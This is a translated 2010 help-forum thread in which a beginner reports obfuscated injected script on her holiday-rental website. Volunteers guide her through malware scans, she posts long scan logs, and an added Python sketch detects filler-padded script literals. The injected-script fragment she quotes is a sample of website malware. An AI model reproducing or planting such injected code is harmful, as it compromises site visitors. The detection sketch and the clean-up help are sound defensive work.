|
 Posted on 20/02/2010 @ 17:13 |
Petite astucienne
| Hello,
I am new to this forum and a beginner with computers. I have a website (holiday cottage rental). For the past few days, a strange message has been appearing on it; here is its content:
try{window.onload=function(){D1btocibhedx = '' + 'r!(!e#(@t(!a&@i&#)l!@@m@^!e&&n^o$()t&^&!-&@@c&#^o#)@m!.!&&m()((o@$n)$e@@#&y@$c!o@n)@!t$!$r)^o#^l!.(&c$o$@&m#).#&x)&e^&(-&c#o^$&m().!&@a$^!v&! ...
How can I get rid of this gibberish and get my site clean again? Visitors will not want to venture onto the site with a message like that.
Edited by chimere06200 on 25/02/2010 11:34
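An added example, not part of the original thread: a Python sketch that scans a local copy of a site's files for string literals padded with filler characters, like the fragment quoted in the post above, and shows what remains once the filler is stripped. The filler set, the 0.4 cut-off, the file-extension list, the function names and the sample page built around the posted fragment are assumptions of this example; a hit marks a line for manual review, nothing more.

```python
import os
import re
from typing import Iterator, List, NamedTuple, Tuple

# Filler characters interleaved with the real text in the posted fragment.
JUNK = set("!@#$%^&*()")
# Share of filler characters above which a literal is reported (assumed cut-off).
THRESHOLD = 0.4
# File types checked in a local copy of the site (assumed list).
WEB_EXTS = (".html", ".htm", ".php", ".js")

# A quoted literal of 8+ characters; the closing quote is optional because an
# injected line may be cut short, as the fragment in the post is.
LITERAL = re.compile(r"""(['"])([^'"\n]{8,})(?:\1|$)""", re.MULTILINE)

# The fragment as posted in the thread (it is truncated there after "v&!").
POSTED_FRAGMENT = (
    "r!(!e#(@t(!a&@i&#)l!@@m@^!e&&n^o$()t&^&!-&@@c&#^o#)@m!.!&&m()((o@$n)$e@@#&y@$c!o@n)@!t$!$r)^o#^l!."
    "(&c$o$@&m#).#&x)&e^&(-&c#o^$&m().!&@a$^!v&!"
)

# Constructed sample page: ordinary markup, then the posted script opening
# appended after </html>, left unterminated exactly where the post cuts off.
SAMPLE_PAGE = (
    "<html><body><h1>Gite</h1>\n"
    "<script>var msg = 'Bienvenue (2 chambres)!';</script>\n"
    "</body></html>\n"
    "<script>try{window.onload=function(){D1btocibhedx = '' + '"
    + POSTED_FRAGMENT + "\n"
)


class Finding(NamedTuple):
    line: int          # 1-based line number of the literal
    junk_ratio: float  # share of filler characters in the literal
    decoded: str       # literal with the filler characters removed
    in_onload: bool    # True when the same line assigns window.onload


def strip_junk(s: str) -> str:
    """Remove the filler characters and return what is left."""
    return "".join(ch for ch in s if ch not in JUNK)


def scan_text(text: str) -> List[Finding]:
    """Report every string literal that is mostly filler characters."""
    lines = text.split("\n")
    findings = []
    for m in LITERAL.finditer(text):
        body = m.group(2)
        ratio = sum(ch in JUNK for ch in body) / len(body)
        decoded = strip_junk(body).strip()
        # Ordinary text and short leftovers are not reported.
        if ratio < THRESHOLD or len(decoded) < 4:
            continue
        line_no = text.count("\n", 0, m.start()) + 1
        findings.append(Finding(line_no, round(ratio, 2), decoded,
                                "window.onload" in lines[line_no - 1]))
    return findings


def scan_tree(root: str) -> Iterator[Tuple[str, Finding]]:
    """Walk a local copy of the site and scan every web file in it."""
    for folder, _dirs, files in os.walk(root):
        for name in sorted(files):
            if name.lower().endswith(WEB_EXTS):
                path = os.path.join(folder, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    for finding in scan_text(fh.read()):
                        yield path, finding


if __name__ == "__main__":
    for f in scan_text(SAMPLE_PAGE):
        print(f"line {f.line}: {f.junk_ratio:.0%} filler, "
              f"onload={f.in_onload}, text left: {f.decoded}")
```
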
|
Posted on 20/02/2010 at 17:17 |
Astucien | |
|
Posted on 20/02/2010 at 20:20 |
Petite astucienne
| Thank you for your reply. I am still not getting anywhere, and I don't know whether I have been hacked. How do I disable my site?
|
|
Posted on 20/02/2010 at 22:23 |
Petite astucienne
| Good evening,
Here are the results of the reports, following your advice. What should I do from here?
Thanks again.
Logfile of random's system information tool 1.06 (written by random/random) Run by maman at 2010-02-20 20:25:59 Microsoft® Windows Vista™ Édition Familiale Premium Service Pack 2 System drive C: has 89 GB (61%) free of 145 GB Total RAM: 2046 MB (48% free)
Malwarebytes' Anti-Malware 1.44
Version de la base de données: 3767
Windows 6.0.6002 Service Pack 2
Internet Explorer 8.0.6001.18882
20/02/2010 22:14:00
mbam-log-2010-02-20 (22-12-53).txt
Type de recherche: Examen complet (C:\|D:\|)
Eléments examinés: 310740
Temps écoulé: 1 hour(s), 24 minute(s), 2 second(s)
Processus mémoire infecté(s): 0
Module(s) mémoire infecté(s): 0
Clé(s) du Registre infectée(s): 1
Valeur(s) du Registre infectée(s): 0
Elément(s) de données du Registre infecté(s): 0
Dossier(s) infecté(s): 1
Fichier(s) infecté(s): 2
Processus mémoire infecté(s): (Aucun élément nuisible détecté)
Module(s) mémoire infecté(s): (Aucun élément nuisible détecté)
Clé(s) du Registre infectée(s):
HKEY_LOCAL_MACHINE\SOFTWARE\EoRezo (Rogue.Eorezo) -> No action taken.
Valeur(s) du Registre infectée(s): (Aucun élément nuisible détecté)
Elément(s) de données du Registre infecté(s): (Aucun élément nuisible détecté)
Dossier(s) infecté(s):
C:\ProgramData\32868532 (Rogue.Multiple) -> No action taken.
Fichier(s) infecté(s):
C:\Users\maman\AppData\Roaming\avdrn.dat (Malware.Trace) -> No action taken.
C:\Users\maman\AppData\Roaming\fvgqad.dat (Malware.Trace) -> No action taken.
|
|
Posted on 20/02/2010 at 22:40 |
Grande Maîtresse astucienne | Good evening,
eliot, I'll take over
chimere06200
your PC is indeed infected
* Download and install UsbFix (by C_XX & Chiquitine29) on your Desktop:
* Plug in the external storage devices (USB stick, external hard drive, etc.) that may have been infected, without opening them
* Right-click the UsbFix shortcut on your desktop and choose Run as administrator.
* Choose option 1 (Recherche [Search])
* Let the tool work.
* Then post the UsbFix.txt report that appears.
Note: The UsbFix.txt report is saved at the root of the disk (C:\UsbFix.txt).
Note: "Process.exe", a component of the tool, is detected by some antivirus products (AntiVir, Dr.Web, Kaspersky Anti-Virus) as a RiskTool. It is not a virus, but a utility intended to terminate processes. In the wrong hands, this utility could stop security software (antivirus, firewall...), hence the alert raised by these antivirus products.
then
* Plug in the external storage devices (USB stick, external hard drive, etc.) that may have been infected, without opening them
* Double-click the UsbFix shortcut on your desktop
* Choose option 2 (Suppression [Deletion])
* Your desktop will disappear and the PC will restart.
* On restart, UsbFix will scan your PC; let the tool work.
* Then post the UsbFix.txt report that appears along with the desktop.
Note: The UsbFix.txt report is saved at the root of the disk (C:\UsbFix.txt). (CTRL+A to select all, CTRL+C to copy and CTRL+V to paste)
then
* Run Malwarebytes' again for a FULL SCAN and delete everything it can still find. Post the report as well as a new RSIT report
|
|
Posted on 20/02/2010 at 23:29 |
Petite astucienne
| Here is the next part ....
############################## | UsbFix V6.097 |
User : maman (Administrateurs) # FREDERIC Update on 20/02/2010 by El Desaparecido , C_XX & Chimay8 Start at: 23:14:17 | 20/02/2010 Website : http://pagesperso-orange.fr/NosTools/index.html Contact : FindyKill.Contact@gmail.com
AMD Athlon(tm) 64 X2 Dual-Core Processor TK-55 Microsoft® Windows Vista™ Édition Familiale Premium (6.0.6002 32-bit) # Service Pack 2 Internet Explorer 8.0.6001.18882 Windows Firewall Status : Disabled AV : Norton Internet Security 2007 [ (!) Disabled | (!) Outdated ] FW : Norton Internet Security[ (!) Disabled ]2007
C:\ -> Disque fixe local # 141,35 Go (86,31 Go free) # NTFS D:\ -> Disque fixe local # 7,7 Go (2,21 Go free) [HP_RECOVERY] # NTFS E:\ -> Disque CD-ROM F:\ -> Disque amovible # 983,72 Mo (359,67 Mo free) # FAT
############################## | Processus actifs |
C:\Windows\System32\smss.exe C:\Windows\system32\csrss.exe C:\Windows\system32\wininit.exe C:\Windows\system32\csrss.exe C:\Windows\system32\services.exe C:\Windows\system32\winlogon.exe C:\Windows\system32\lsass.exe C:\Windows\system32\lsm.exe C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe C:\Windows\system32\SLsvc.exe C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe C:\Program Files\Alwil Software\Avast5\AvastSvc.exe C:\Windows\system32\Dwm.exe C:\Windows\Explorer.EXE C:\Windows\system32\runonce.exe C:\Windows\System32\spoolsv.exe C:\Windows\system32\svchost.exe C:\Windows\system32\taskeng.exe C:\Windows\system32\taskeng.exe C:\Windows\system32\svchost.exe C:\Program Files\Common Files\LightScribe\LSSrvc.exe C:\Windows\System32\svchost.exe C:\Program Files\Sony Ericsson\Sony Ericsson PC Suite\SupServ.exe C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe C:\Windows\System32\svchost.exe C:\Windows\system32\SearchIndexer.exe C:\Windows\system32\DRIVERS\xaudio.exe C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe C:\Program Files\Spybot - Search & Destroy\SDWinSec.exe C:\Windows\system32\WUDFHost.exe C:\Windows\system32\wbem\wmiprvse.exe
################## | Elements infectieux |
Supprimé ! C:\Users\maman\AppData\Local\Temp\Setup.exe Supprimé ! C:\$Recycle.Bin\S-1-5-21-1567447838-2004768462-536447305-1000 Supprimé ! C:\$Recycle.Bin\S-1-5-21-1567447838-2004768462-536447305-500 Supprimé ! C:\$Recycle.Bin\S-1-5-21-1567447838-2004768462-536447305-501 Supprimé ! C:\$Recycle.Bin\S-1-5-21-2071026311-1957086265-568470311-500 Supprimé ! D:\$Recycle.Bin\S-1-5-21-1567447838-2004768462-536447305-1000 Supprimé ! D:\$Recycle.Bin\S-1-5-21-1567447838-2004768462-536447305-501
################## | Registre |
Supprimé ! [HKLM\software\microsoft\shared tools\msconfig\startupreg\CTFMON]
################## | Mountpoints2 |
Supprimé ! HKCU\...\Explorer\MountPoints2\{0c39c2ac-4cb5-11dd-b620-001b24dd66d7}\Shell\Auto\Command Supprimé ! HKCU\...\Explorer\MountPoints2\{4bee0075-3ed8-11dd-b794-001b24dd66d7}\Shell\AutoRun\Command
################## | Listing des fichiers présent |
[21/08/2007 23:07|--a------|74] C:\autoexec.bat [11/04/2009 07:36|-rahs----|333257] C:\bootmgr [18/09/2006 22:43|--a------|10] C:\config.sys [05/08/2008 16:22|--a------|477] C:\dkab.log [19/01/2008 21:32|-rahs----|0] C:\IO.SYS [19/01/2008 21:32|-rahs----|0] C:\MSDOS.SYS [?|?|?] C:\pagefile.sys [15/03/2009 17:25|--a------|200820] C:\UpdatedResults.cst [20/02/2010 23:17|--a------|3662] C:\UsbFix.txt [11/09/2005 16:18|---hs----|340] D:\AUTOMODE [22/12/2007 21:52|---hs----|13] D:\BLOCK.RIN [04/10/2006 00:02|---hs----|438328] D:\bootmgr [03/11/2006 20:43|---hs----|117] D:\Desktop.ini [10/09/2002 17:14|---hs----|8134] D:\Folder.htt [30/11/2007 00:24|---hs----|698] D:\MASTER.LOG [03/11/2005 16:19|---hs----|181736] D:\protect.ed [30/11/2007 00:24|---hs----|0] D:\USER [18/01/2010 10:44|--a------|26058] F:\RIBS.pdf [12/01/2010 15:54|--a------|3044469] F:\AUDA_VELOSO.pdf [20/02/2010 23:12|--a------|1624] F:\BOOTEX.LOG
################## | Vaccination |
# C:\autorun.inf -> Dossier créé par UsbFix (El Desaparecido). # D:\autorun.inf -> Dossier créé par UsbFix (El Desaparecido). # F:\autorun.inf -> Dossier créé par UsbFix (El Desaparecido).
################## | Upload |
Veuillez envoyer le fichier : C:\UsbFix_Upload_Me_FREDERIC.zip : http://chiquitine.changelog.fr/Sample/Upload.php Merci pour votre contribution .
################## | ! Fin du rapport # UsbFix V6.097 ! |
thank you for your patience |
|
Posted on 20/02/2010 at 23:36 |
Grande Maîtresse astucienne |
OK for USBFix, now do the next step
* Run Malwarebytes' again for a FULL SCAN and delete everything it can still find. Post the report as well as a new RSIT report
|
|
Posted on 20/02/2010 at 23:54 |
Petite astucienne
| OK, for now it's churning away |
|
Posted on 21/02/2010 at 00:30 |
Grande Maîtresse astucienne |
then let it churn away in peace.........LOL
tomorrow I most likely won't be by before mid or even late afternoon |
|
Posted on 21/02/2010 at 00:59 |
Petite astucienne
| full scan:
Malwarebytes' Anti-Malware 1.44
Version de la base de données: 3767
Windows 6.0.6002 Service Pack 2
Internet Explorer 8.0.6001.18882
21/02/2010 00:52:13
mbam-log-2010-02-21 (00-52-13).txt
Type de recherche: Examen complet (C:\|D:\|)
Eléments examinés: 309642
Temps écoulé: 1 hour(s), 18 minute(s), 35 second(s)
Processus mémoire infecté(s): 0
Module(s) mémoire infecté(s): 0
Clé(s) du Registre infectée(s): 0
Valeur(s) du Registre infectée(s): 0
Elément(s) de données du Registre infecté(s): 0
Dossier(s) infecté(s): 0
Fichier(s) infecté(s): 0
Processus mémoire infecté(s): (Aucun élément nuisible détecté)
Module(s) mémoire infecté(s): (Aucun élément nuisible détecté)
Clé(s) du Registre infectée(s): (Aucun élément nuisible détecté)
Valeur(s) du Registre infectée(s): (Aucun élément nuisible détecté)
Elément(s) de données du Registre infecté(s): (Aucun élément nuisible détecté)
Dossier(s) infecté(s): (Aucun élément nuisible détecté)
Fichier(s) infecté(s): (Aucun élément nuisible détecté)
Logfile of random's system information tool 1.06 (written by random/random) Run by maman at 2010-02-21 00:59:50 Microsoft® Windows Vista™ Édition Familiale Premium Service Pack 2 System drive C: has 88 GB (61%) free of 145 GB Total RAM: 2046 MB (53% free)
Logfile of Trend Micro HijackThis v2.0.2 Scan saved at 01:00:11, on 21/02/2010 Platform: Windows Vista SP2 (WinNT 6.00.1906) MSIE: Internet Explorer v8.00 (8.00.6001.18882) Boot mode: Normal
Running processes: C:\Windows\system32\Dwm.exe C:\Windows\system32\taskeng.exe C:\Windows\explorer.exe C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe C:\Program Files\Philips\SA28XX Device Manager\main.exe C:\Program Files\Windows Media Player\wmpnscfg.exe C:\Program Files\HP\Digital Imaging\bin\hpqSTE08.exe C:\Program Files\HP\Digital Imaging\bin\hpqbam08.exe C:\Program Files\Mozilla Firefox\firefox.exe C:\Windows\notepad.exe C:\Users\maman\Saved Games\Downloads\RSIT.exe C:\Program Files\trend micro\maman.exe C:\Windows\system32\msfeedssync.exe
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=FR_FR&c=73&bd=Pavilion&pf=laptop R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896 R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://fr.msn.com/ R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Windows Internet Explorer R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = O1 - Hosts: ::1 localhost O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll O2 - BHO: EoRezoBHO - {64F56FC1-1272-44CD-BA6E-39723696E350} - C:\PROGRA~1\EoRezo\EoAdv\EOREZO~1.DLL (file missing) O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file) O2 - BHO: Programme d'aide de l'Assistant de connexion Windows Live - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll O4 - HKLM\..\Run: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hide O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe O4 - HKLM\..\Run: [QlbCtrl] %ProgramFiles%\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe /Start O4 - HKLM\..\Run: [HP Health Check Scheduler] c:\Program Files\Hewlett-Packard\HP Health Check\HPHC_Scheduler.exe O4 - HKLM\..\Run: [hpWirelessAssistant] 
%ProgramFiles%\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe O4 - HKLM\..\Run: [WAWifiMessage] %ProgramFiles%\Hewlett-Packard\HP Wireless Assistant\WiFiMsg.exe O4 - HKLM\..\Run: [HP Software Update] C:\Program Files\HP\HP Software Update\HPWuSchd2.exe O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe" O4 - HKLM\..\Run: [Windows Mobile-based device management] %windir%\WindowsMobile\wmdSync.exe O4 - HKLM\..\Run: [NvSvc] RUNDLL32.EXE C:\Windows\system32\nvsvc.dll,nvsvcStart O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\Windows\system32\NvCpl.dll,NvStartup O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\Windows\system32\NvMcTray.dll,NvTaskbarInit O4 - HKLM\..\Run: [avast5] C:\PROGRA~1\ALWILS~1\Avast5\avastUI.exe /nogui O4 - HKLM\..\RunOnce: [Launcher] %WINDIR%\SMINST\launcher.exe O4 - HKCU\..\Run: [LightScribe Control Panel] C:\Program Files\Common Files\LightScribe\LightScribeControlPanel.exe -hidden O4 - HKCU\..\Run: [ehTray.exe] C:\Windows\ehome\ehTray.exe O4 - HKCU\..\Run: [Skype] "C:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized O4 - HKCU\..\Run: [WMPNSCFG] C:\Program Files\Windows Media Player\WMPNSCFG.exe O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe O4 - HKCU\..\Run: [Sony Ericsson PC Suite] "C:\Program Files\Sony Ericsson\Sony Ericsson PC Suite\SEPCSuite.exe" /systray /nologon O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'SERVICE LOCAL') O4 - HKUS\S-1-5-19\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter (User 'SERVICE LOCAL') O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'SERVICE RÉSEAU') O4 - Global Startup: HP Digital Imaging Monitor.lnk = C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe O4 - Global Startup: Philips 
Gestionnaire de périphériques.lnk = C:\Program Files\Philips\SA28XX Device Manager\main.exe O8 - Extra context menu item: Add to Google Photos Screensa&ver - res://C:\Windows\system32\GPhotos.scr/200 O8 - Extra context menu item: E&xporter vers Microsoft Excel - res://C:\PROGRA~1\MICROS~3\Office10\EXCEL.EXE/3000 O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\PROGRA~1\Java\JRE16~3.0_0\bin\ssv.dll O9 - Extra 'Tools' menuitem: Console Java (Sun) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\PROGRA~1\Java\JRE16~3.0_0\bin\ssv.dll O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~3\Office12\REFIEBAR.DLL O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll O13 - Gopher Prefix: O16 - DPF: {D4323BF2-006A-4440-A2F5-27E3E7AB25F8} - http://a532.g.akamai.net/f/532/6712/5m/virtools.download.akamai.com/6712/player/install/installer.exe O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Alwil Software\Avast5\AvastSvc.exe O23 - Service: avast! Mail Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast5\AvastSvc.exe O23 - Service: avast! Web Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast5\AvastSvc.exe O23 - Service: Com4Qlb - Hewlett-Packard Development Company, L.P. - C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\Com4Qlb.exe O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe O23 - Service: HP Health Check Service - Hewlett-Packard - c:\Program Files\Hewlett-Packard\HP Health Check\hphc_service.exe O23 - Service: hpqwmiex - Hewlett-Packard Development Company, L.P. 
- C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe O23 - Service: LightScribeService Direct Disc Labeling Service (LightScribeService) - Hewlett-Packard Company - C:\Program Files\Common Files\LightScribe\LSSrvc.exe O23 - Service: Sony Ericsson OMSI download service (OMSI download service) - Unknown owner - C:\Program Files\Sony Ericsson\Sony Ericsson PC Suite\SupServ.exe O23 - Service: RoxMediaDB9 - Sonic Solutions - C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxMediaDB9.exe O23 - Service: SBSD Security Center Service (SBSDWSCService) - Safer Networking Ltd. - C:\Program Files\Spybot - Search & Destroy\SDWinSec.exe O23 - Service: stllssvr - MicroVision Development, Inc. - C:\Program Files\Common Files\SureThing Shared\stllssvr.exe O23 - Service: Symantec AppCore Service (SymAppCore) - Unknown owner - c:\Program Files\Common Files\Symantec Shared\AppCore\AppSvc32.exe (file missing) O23 - Service: XAudioService - Conexant Systems, Inc. - C:\Windows\system32\DRIVERS\xaudio.exe
-- End of file - 7999 bytes
======Scheduled tasks folder======
C:\Windows\tasks\HPCeeScheduleFormaman.job C:\Windows\tasks\Maintenance en 1 clic.job C:\Windows\tasks\User_Feed_Synchronization-{837C62D4-F802-42E1-BA8C-0E2FF49DE2F0}.job
======Registry dump======
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}] Adobe PDF Link Helper - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2009-02-27 75128]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{53707962-6F74-2D53-2644-206D7942484F}] Spybot-S&D IE Protection - C:\PROGRA~1\SPYBOT~1\SDHelper.dll [2009-01-26 1879896]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{64F56FC1-1272-44CD-BA6E-39723696E350}] EoBho Class - C:\PROGRA~1\EoRezo\EoAdv\EOREZO~1.DLL []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}] SSVHelper Class - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll [2008-06-10 509328]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{7E853D72-626A-48EC-A868-BA8D5E23E045}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{9030D464-4C02-4ABF-8ECC-5164760863C6}] Programme d'aide de l'Assistant de connexion Windows Live - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-02-17 408440]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] "Windows Defender"=C:\Program Files\Windows Defender\MSASCui.exe [2008-01-19 1008184] "SynTPEnh"=C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2007-01-13 827392] "QlbCtrl"=C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe [2007-02-13 159744] "HP Health Check Scheduler"=c:\Program Files\Hewlett-Packard\HP Health Check\HPHC_Scheduler.exe [2008-06-16 75008] "hpWirelessAssistant"=C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe [2007-03-01 472776] "WAWifiMessage"=C:\Program Files\Hewlett-Packard\HP Wireless Assistant\WiFiMsg.exe [2007-01-10 317128] "HP Software Update"=C:\Program Files\HP\HP Software Update\HPWuSchd2.exe [2006-12-10 49152] "EoEngine"= [] "QuickTime Task"=C:\Program Files\QuickTime\qttask.exe [2008-03-02 98304] "Adobe Reader Speed Launcher"=C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe [2009-02-27 35696] "Windows Mobile-based device management"=C:\Windows\WindowsMobile\wmdSync.exe [2006-11-02 215552] "NvSvc"=C:\Windows\system32\nvsvc.dll [2007-09-19 86016] "NvCplDaemon"=C:\Windows\system32\NvCpl.dll [2007-09-19 8497696] "NvMediaCenter"=C:\Windows\system32\NvMcTray.dll [2007-09-19 81920] "avast5"=C:\PROGRA~1\ALWILS~1\Avast5\avastUI.exe [2010-02-11 2756488]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce] "Launcher"=C:\Windows\SMINST\launcher.exe [2006-11-07 44128]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] "LightScribe Control Panel"=C:\Program Files\Common Files\LightScribe\LightScribeControlPanel.exe [2007-04-19 484904] "ehTray.exe"=C:\Windows\ehome\ehTray.exe [2008-01-19 125952] "Skype"=C:\Program Files\Skype\Phone\Skype.exe [2009-06-26 25604904] "WMPNSCFG"=C:\Program Files\Windows Media Player\WMPNSCFG.exe [2008-01-19 202240] "SpybotSD TeaTimer"=C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe [2009-03-05 2260480] "Sony Ericsson PC Suite"=C:\Program Files\Sony Ericsson\Sony Ericsson PC Suite\SEPCSuite.exe [2009-11-20 434176]
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\32868532] C:\ProgramData\32868532\32868532.exe []
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\BitComet] C:\Program Files\BitComet\BitComet.exe /tray []
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Sony Ericsson PC Suite] C:\Program Files\Sony Ericsson\Mobile2\Application Launcher\Application Launcher.exe /startoptions []
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\sysgif32] C:\Users\maman\AppData\Local\Temp\~TM50A7.tmp []
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup HP Digital Imaging Monitor.lnk - C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe Philips Gestionnaire de périphériques.lnk - C:\Program Files\Philips\SA28XX Device Manager\main.exe
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\WudfPf]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\WudfRd]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\WudfSvc]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\WudfUsbccidDriver]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] "LogonHoursAction"=2 "DontDisplayLogonHoursWarnings"=1
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System] "EnableLUA"=0 "dontdisplaylastusername"=0 "legalnoticecaption"= "legalnoticetext"= "shutdownwithoutlogon"=1 "undockwithoutlogon"=1 "EnableUIADesktopToggle"=0
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer] "NoDriveTypeAutoRun"=255 "NoDriveAutoRun"=255 "HonorAutoRunSetting"=0
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer] "BindDirectlyToPropertySetStorage"= "NoDriveAutoRun"= "NoDriveTypeAutoRun"= "HonorAutoRunSetting"=
[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]
[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]
======File associations======
.js - edit - C:\Windows\System32\Notepad.exe %1 .js - open - C:\Windows\System32\WScript.exe "%1" %* .txt - open - C:\Windows\notepad.exe %1
======List of files/folders created in the last 1 months======
